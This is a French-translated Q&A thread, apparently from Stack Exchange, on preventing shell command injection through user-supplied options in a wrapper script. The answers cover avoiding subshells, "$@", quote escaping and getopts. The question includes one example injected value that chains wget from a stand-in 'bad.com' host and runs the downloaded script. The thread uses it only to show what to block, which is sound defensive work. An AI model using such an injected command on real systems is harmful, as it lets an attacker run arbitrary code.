Comment empêcher l'injection de commande via les options de commande?

J'ai une application wrapper où je dois laisser l'utilisateur spécifier des options personnalisées à passer à un simulateur. Cependant, je veux m'assurer que l'utilisateur n'injecte pas d'autres commandes via les options utilisateur. Quelle est la meilleure façon d'y parvenir?

Par exemple.

• L'utilisateur fournit: -a -b
• L'application s'exécute: mysim --preset_opt -a -b

Cependant, je ne veux pas que cela se produise:

• L'utilisateur fournit: && wget http:\\bad.com\bad_code.sh && .\bad_code.sh
• L'application s'exécute: mysim --preset_opt && wget http:\\bad.com\bad_code.sh && .\bad_code.sh

Actuellement, je pense que je pourrais simplement entourer chaque option fournie par l'utilisateur de guillemets simples 'et supprimer tous les guillemets simples fournis par l'utilisateur, de sorte que la commande dans le dernier exemple se révèle être inoffensive:

mysim -preset_opt '&&' 'wget' 'http:\\bad.com\bad_code.sh' '&&' '.\bad_code.sh'

Remarque: La mysimcommande s'exécute dans le cadre d'un script shell dans un conteneur docker / lxc. J'utilise Ubuntu.

Si vous avez le contrôle sur le programme wrapper, assurez-vous qu'il n'invoque pas de sous-shell. Au fond, une instruction pour exécuter un programme se compose du chemin complet (absolu ou relatif au répertoire courant) vers l'exécutable, et d'une liste de chaînes à passer en arguments. La recherche PATH, les espaces séparant les arguments, les guillemets et les opérateurs de contrôle sont tous fournis par le shell. Pas de coquille, pas de douleur.

Par exemple, avec un wrapper Perl, utilisez la forme liste de execou system. Dans de nombreuses langues, appelez l'une des fonctions execou execXXX(ou unix.execou quel que soit son nom) plutôt que system, ou os.spawnavec shell=False, ou quoi que cela prenne.

Si le wrapper est un script shell, utilisez "$@"pour transmettre les arguments, par exemple

#!/bin/sh
mysim -preset-opt "$@"

Si vous n'avez pas le choix et que le programme wrapper invoque un shell, vous devrez citer les arguments avant de les passer au shell. Le moyen le plus simple de citer des arguments est le suivant:

1. Dans chaque argument, remplacez chaque occurrence de '(guillemet simple) par la chaîne de quatre caractères '\''. (par exemple don'tdevient don'\''t)
2. Ajoutez 'au début de chaque argument et également à la fin de chaque argument. (par exemple de don't, don'\''tdevient 'don'\''t')
3. Concatène les résultats avec un espace entre les deux.

Si vous devez le faire dans un wrapper shell, voici un moyen.

arguments='-preset-opt'
for x; do
  arguments="$arguments '"
  while case $x in
    *\'*) arguments="$arguments${x%%\'*}'\\''"; x=${x#*\'};;
    *) false;; esac
  do :; done
  arguments="$arguments$x'"
done

(Malheureusement, la ${VAR//PATTERN/REPLACEMENT}construction de bash , qui devrait être utile ici, nécessite des citations originales, et je ne pense pas que vous puissiez obtenir '\''le texte de remplacement.)

Vous pouvez utiliser l' ${VAR//PATTERN/REPLACEMENT}idiome de Bash pour transformer une citation unique 'en la '\''mettant d'abord '\''dans une variable (comme étape intermédiaire), puis en développant cette variable comme REPLACEMENTélément dans l'idiome Bash mentionné.

# example 
{
str="don't"
escsquote="'\''"
str="'${str//\'/${escsquote}}'"
printf '%s\n' "$str"   #  'don'\''t'
}

Vous pouvez utiliser getoptsdans bashlequel peut analyser les arguments pour vous, par exemple:

while getopts a:b: opts; do
  case ${opts} in
    a)
      A=${OPTARG}
      ;;
    b)
      B=${OPTARG}
      ;;
  esac
done